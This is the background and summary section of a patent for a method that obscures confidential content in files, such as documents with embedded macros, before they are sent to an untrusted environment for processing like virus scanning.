This invention relates generally to data processing systems and networks and, in particular, to those systems that enable the simultaneous existence of different sites or environments in which access to information may be restricted to one or several of the sites or environments.
Many current document handling systems such as word processors and spread sheet programs are capable of including an active program logic portion along with data and/or text in a single file. Such a file is capable of being exchanged between data processing systems or between environments located on a single system. Such a file is representative of a class of objects used for exchanging code and/or data between distinct systems or environments. Such objects are referred to herein as information containers.
There are a number of software tools that are currently available for searching files for content with specific characteristics (e.g., unwanted data or active program content). Examples of such tools include anti-virus programs, string matching programs, and a variety of data mining programs.
A problem is created if a particular software tool is not available or cannot be run at a first data processing environment where the use of the tool is desired. In this case it is typically necessary to make the information container available at a second environment where the tool is available. However, the second data processing environment may be considered, relative to the first, originating data processing environment, as an xe2x80x9cuntrustedxe2x80x9d environment. As such, an operator at the first data processing environment may be reluctant or unwilling to expose an information container of interest to the second data processing environment, as the information container of interest may contain restricted information, considered herein to be any information that is deemed to be sensitive, confidential, secret and/or proprietary, or any other information deemed as restricted to the first data processing environment. Restricted information may exist in the information container within data and/or program modules.
Even if the operator of the first data processing environment were to consider the second data processing environment as a trusted environment, it may still be necessary to transport the information container of interest through an untrusted medium, e.g., through a data communications network such as the Internet. Alternatively, both data processing environments may exist on the same logical or physical data processing unit. In such cases it may be possible to expose the information container of interest to the second data processing environment through a means which does not require transport. One example of such a means is to change the access permission associated with the information container existing in the first data processing environment in order to allow the second data processing environment to directly access the information container of interest.
It is a first object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment so as to overcome the foregoing and other problems.
It is a second object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment by first automatically identifying that information which causes the entire information container to be deemed as containing restricted information.
It is a third object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment by first automatically identifying that information which causes the entire information container to be deemed as containing restricted information, and then automatically creating a new or modified version of the initial information container which contains none of the automatically identified information.
It is a fourth object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment by first automatically identifying that information which causes the entire information container to be deemed as containing restricted information, and then automatically creating a new or modified version of the initial information container which contains a replacement for the automatically identified information such that the entire modified or created information container is not deemed as containing restricted information.
The foregoing and other problems are overcome and the objects and advantages are realized by methods and apparatus in accordance with embodiments of this invention.
In a first aspect this invention teaches a method for operating a data processing system of a type that includes a first data processing environment located within a trusted environment and a second data processing environment located within, or that is accessible through, an untrusted environment. A trusted environment can be comprised of one or more distinct environments which are all trusted. The method includes a first step, executed at the first data processing environment, of operating a first software agent for detecting a presence of an information container with characteristics that make it desirable for the information container to be used in the untrusted environment. A second step of the method analyzes the identified information container in order to identify the presence and location(s) of at least one predetermined type of restricted information. A third step of the method modifies the information container or creates a new information container in which all information identified as restricted is obscured. In a fourth step some or no unrestricted information (preserved in its original or an equivalent form) and/or some obscured information is made available to the untrusted environment for use.
In a further aspect this invention teaches a method for securely exposing an information container of interest from a first data processing environment to a second data processing environment, and includes computer executed steps of (a) identifying the presence and location of all occurrences of at least one predetermined type of restricted information within the information container of interest, (b) obscuring the restricted information using a process which has the property of converting restricted information to a form that would not be identified as restricted by the criteria used in step (a), where obscuring process may include at least one of removal, replacement, encryption, translation, modification and a structured substitution of the restricted information. This method further includes the steps of: (c) collecting some or none of the unrestricted information in its original or an equivalent form with some or none of the obscured information, and (d) making the collected information separately or jointly available to the second data processing environment without exposing any of the restricted information to the second data processing environment. The method may further include the steps of: (e) processing the supplied information at the second data processing environment and (f) performing actions based on the processing results.
The processing performed at the second data processing environment can utilize the supplied information in any manner available at the second data processing environment, such as detecting the presence of an undesirable software or data entity, identifying an undesirable software or data entity, detecting the presence of specific values, types, or patterns in data which has not been obscured, or removing an undesirable software or data entity from the supplied information. In some cases, processing may include a step of sending resulting information to the first data processing environment or to other data processing environments. Processing may also request additional information one or more times from the first data processing environment, or from other data processing environments, in order to complete the processing at the second data processing environment.